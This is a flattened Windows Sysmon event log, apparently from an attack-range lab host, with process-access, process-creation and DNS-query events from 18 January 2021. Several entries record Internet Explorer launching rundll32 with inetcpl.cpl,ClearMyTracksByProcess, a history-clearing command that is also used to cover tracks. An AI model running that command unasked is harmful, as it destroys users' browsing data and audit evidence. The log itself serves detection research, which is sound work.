14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b7e|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.856{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:276824072 WinX:0 WinY:0 IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000017144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b62|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.854{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:276824072 WinX:0 WinY:0 IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000017141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b42|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.852{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8388616 WinX:0 WinY:0 
IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 22542200x800000000000000017134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.284{59A5CD1D-8E56-6005-2E00-00000000A301}2464151.80.216.34.in-addr.arpa.0type: 12 ec2-34-216-80-151.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.282{59A5CD1D-8E56-6005-2E00-00000000A301}2464255.168.40.52.in-addr.arpa.0type: 12 ec2-52-40-168-255.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.279{59A5CD1D-8E56-6005-2E00-00000000A301}2464190.114.165.35.in-addr.arpa.0type: 12 ec2-35-165-114-190.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}246414.250.239.44.in-addr.arpa.0type: 12 ec2-44-239-250-14.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}246433.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-33.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}2464111.177.222.52.in-addr.arpa.0type: 12 
server-52-222-177-111.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}2464143.169.164.54.in-addr.arpa.0type: 12 ec2-54-164-169-143.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.277{59A5CD1D-8E56-6005-2E00-00000000A301}246464.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-64.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.276{59A5CD1D-8E56-6005-2E00-00000000A301}246448.163.55.23.in-addr.arpa.0type: 12 a23-55-163-48.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.042{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.041{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com013.227.134.176;13.227.134.206;13.227.134.67;13.227.134.71;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.040{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com0::ffff:13.227.134.71;::ffff:13.227.134.176;::ffff:13.227.134.206;::ffff:13.227.134.67;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.900{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-protection.cdn.mozilla.net0type: 5 
d1zkz3k4cclnv6.cloudfront.net;99.84.90.33;99.84.90.50;99.84.90.122;99.84.90.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.897{59A5CD1D-945A-6005-3305-00000000A301}7052d228z91au11ukj.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.896{59A5CD1D-945A-6005-3305-00000000A301}7052d228z91au11ukj.cloudfront.net052.222.177.13;52.222.177.40;52.222.177.62;52.222.177.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.895{59A5CD1D-945A-6005-3305-00000000A301}7052snippets.cdn.mozilla.net0type: 5 d228z91au11ukj.cloudfront.net;::ffff:52.222.177.111;::ffff:52.222.177.13;::ffff:52.222.177.40;::ffff:52.222.177.62;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.872{59A5CD1D-945A-6005-3305-00000000A301}7052prod.pocket.prod.cloudops.mozgcp.net02600:1901:0:524c::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.870{59A5CD1D-945A-6005-3305-00000000A301}7052d1zkz3k4cclnv6.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.866{59A5CD1D-945A-6005-3305-00000000A301}7052d1zkz3k4cclnv6.cloudfront.net099.84.90.20;99.84.90.33;99.84.90.50;99.84.90.122;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.865{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-protection.cdn.mozilla.net0type: 5 
d1zkz3k4cclnv6.cloudfront.net;::ffff:99.84.90.122;::ffff:99.84.90.20;::ffff:99.84.90.33;::ffff:99.84.90.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.854{59A5CD1D-945A-6005-3305-00000000A301}7052proxyserverecs-1736642167.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.852{59A5CD1D-945A-6005-3305-00000000A301}7052proxyserverecs-1736642167.us-east-1.elb.amazonaws.com054.209.196.141;3.211.216.81;3.232.128.142;34.192.53.143;52.20.179.133;52.86.239.227;54.147.76.56;54.164.169.143;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.852{59A5CD1D-945A-6005-3305-00000000A301}7052prod.pocket.prod.cloudops.mozgcp.net034.120.5.221;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.851{59A5CD1D-945A-6005-3305-00000000A301}7052spocs.getpocket.com0type: 5 proxyserverecs-1736642167.us-east-1.elb.amazonaws.com;::ffff:54.164.169.143;::ffff:54.209.196.141;::ffff:3.211.216.81;::ffff:3.232.128.142;::ffff:34.192.53.143;::ffff:52.20.179.133;::ffff:52.86.239.227;::ffff:54.147.76.56;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.851{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.cdn.mozilla.net0type: 5 getpocket-cdn.prod.mozaws.net;type: 5 prod.pocket.prod.cloudops.mozgcp.net;::ffff:34.120.5.221;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.780{59A5CD1D-945A-6005-3305-00000000A301}7052dzlgdtxcws9pb.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.775{59A5CD1D-945A-6005-3305-00000000A301}7052dzlgdtxcws9pb.cloudfront.net0143.204.90.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.774{59A5CD1D-945A-6005-3305-00000000A301}7052www.firefox.com0type: 5 fxc-prod.moz.works;type: 5 dzlgdtxcws9pb.cloudfront.net;::ffff:143.204.90.114;C:\Program Files\Mozilla Firefox\firefox.exe 